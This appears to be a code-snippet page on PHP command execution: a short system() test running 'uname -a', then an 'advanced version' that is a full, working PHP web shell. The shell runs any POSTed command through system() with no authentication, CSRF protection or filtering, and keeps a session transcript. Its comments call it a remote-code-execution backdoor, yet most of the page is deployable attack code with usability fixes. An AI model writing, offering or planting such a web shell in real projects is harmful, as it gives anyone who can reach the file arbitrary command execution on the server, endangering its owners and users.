PHP


PHP `system()` command execution — minimal proof of concept (runs a fixed command, no user input)

<?php
// Smoke test for command execution through PHP's system(): run a fixed
// `uname -a` with stderr merged into stdout (so a failure is visible in the
// page too) and dump the value system() hands back, which is the last line
// of the command's output. system() already echoes the full output on its
// own, so the page shows the output once, then the var_dump of its last line.
// The command is hard-coded, so there is no injection surface here; what it
// reveals is bounded by the privileges of the web-server user.
echo '<pre>';
$lastLine = system('uname -a 2>&1');
var_dump($lastLine);

Advanced version: a session-backed web shell with a persistent command transcript and a "Clear history" button

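<?php
    // Minimal PHP web shell.
    //
    // Every request that POSTs `cmd` runs it through system() with the
    // privileges of the web-server user. There is no authentication, no
    // CSRF token and no command filtering: anyone who can reach this file can
    // execute arbitrary commands on the host, so it is a remote-code-execution
    // backdoor by construction. Never leave it on a reachable server.
    //
    // State: the raw command history and the rendered transcript ("stream")
    // are kept in the PHP session, i.e. server-side in the session store, until
    // "Clear history" is pressed or the session expires.
    //
    // Fixes over the naive version: every POST/session read is guarded against
    // an absent key, command text and command output are HTML-escaped before
    // they are stored/rendered (the output of an arbitrary command can contain
    // markup or script), the output buffer is closed instead of left open, and
    // the Enter-key handler targets the command form instead of the
    // "Clear history" form.
    session_start();

    // "Clear history" form: drop both session arrays. isset() guards the
    // ordinary case where the key is absent (no undefined-index notice).
    if (isset($_POST['clearHistory']) && $_POST['clearHistory'] === 'true')
    {
        unset($_SESSION['history'], $_SESSION['stream']);
    }
?>
<!DOCTYPE html>
<html>
    <head>
        <title>Web shell</title>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <style>
            #cmd {width: 90%;}
        </style>
    </head>
    <body>
        <?php
            // Only accept a scalar string command; an array (cmd[]=...) would
            // otherwise be stringified to "Array" and executed.
            $cmd = (isset($_POST['cmd']) && is_string($_POST['cmd'])) ? $_POST['cmd'] : null;
            // An empty submission is ignored rather than spawning a shell for
            // nothing and adding a blank transcript entry.
            if ($cmd !== null && $cmd !== '')
            {
                $_SESSION['history'][] = $cmd;
                // The transcript is stored as HTML fragments, so escape the
                // command text before wrapping it in markup.
                $_SESSION['stream'][] = '<strong>' . htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') . '</strong>';

                // Merge stderr into stdout so failures show up in the page.
                $cmd .= ' 2>&1';

                // system() writes straight to the response; capture it with an
                // output buffer, then close the buffer. The original called
                // ob_clean(), which leaves the buffer open so the rest of the
                // page is silently captured as well.
                ob_start();
                system($cmd);
                $output = ob_get_contents();
                ob_end_clean();
                // Escape the raw output: it is attacker/command controlled text
                // going into an HTML <pre>.
                $_SESSION['stream'][] = htmlspecialchars($output, ENT_QUOTES, 'UTF-8');
            }

            // First visit (or right after clearing) has no transcript yet.
            $stream = isset($_SESSION['stream']) ? $_SESSION['stream'] : array();
            // Value echoed back into the input box; empty when nothing was posted.
            $lastCmd = (isset($_POST['cmd']) && is_string($_POST['cmd'])) ? $_POST['cmd'] : '';
        ?>

        <pre><?php echo join('<br/>', $stream); ?></pre>
        <form action="" method="post" style="float: right; display: inline-block;">
            <input type="hidden" name="clearHistory" value="true" />
            <input type="submit" value="Clear history" />
        </form>
        <form id="cmdForm" action="" method="post">
            $ <input id="cmd" type="text" name="cmd" onkeypress="return searchKeyPress(event);" value="<?php echo htmlspecialchars($lastCmd, ENT_QUOTES, 'UTF-8'); ?>" />
            <input type="submit" value="Send" />
            <script>
                // Focus the command box by id. document.forms[0] is the
                // "Clear history" form above, so the old code focused its
                // hidden input and submitted the wrong form on Enter.
                document.getElementById('cmd').focus();

                // Submit the command form on Enter. Returning false only for
                // Enter suppresses the browser's own submit so the command is
                // not sent twice; every other key keeps its default action.
                function searchKeyPress(e)
                {
                    // look for window.event in case event isn't passed in
                    if (typeof e === 'undefined' && window.event) { e = window.event; }
                    if (e.keyCode === 13)
                    {
                        document.getElementById('cmdForm').submit();
                        return false;
                    }

                    return true;
                }

                // Keep the newest transcript entry in view.
                window.scrollTo(0, document.body.scrollHeight);
            </script>
        </form>
    </body>
</html>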